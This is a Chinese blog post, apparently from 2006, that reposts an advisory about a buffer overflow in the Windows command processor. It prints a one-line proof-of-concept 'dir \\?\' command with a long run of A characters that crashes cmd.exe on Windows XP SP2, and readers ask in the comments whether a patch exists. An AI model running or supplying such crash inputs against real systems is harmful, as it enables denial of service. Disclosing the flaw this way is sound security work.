真正的dir溢出

刚在CN.Tink那里看到的,哈哈,挺好玩的!
我试了下,截图如下:

Windows Command Processor CMD.EXE Buffer Overflow

Execute the following line in cmd.exe (copy-paste)..
tested on winxp sp2 (fully patched) on 2006/10/06/17.56

(it is a single command, has been split into multiple lines for readability sake).
%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

直接输入dir \\?\AAA(超过260个A)也会引发错误
来自国外一个站,原文:http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  • 但丁

    没打补丁看的见这个效果!我的电脑看不到!

  • wszf

    我靠。。。铞。。。 :!:

  • xi4oyu

    貌似\\?\就是告诉shell放弃文件名检查。。。。

  • 鬼仔

    直接输入dir \\?\AAA(超过260个A)也会引发错误

  • fly

    那这个DIR溢出有补丁吗?
    是哪个呀?微软上面找不到呀… :cry:

  • 鬼仔

    好像没有。

发表评论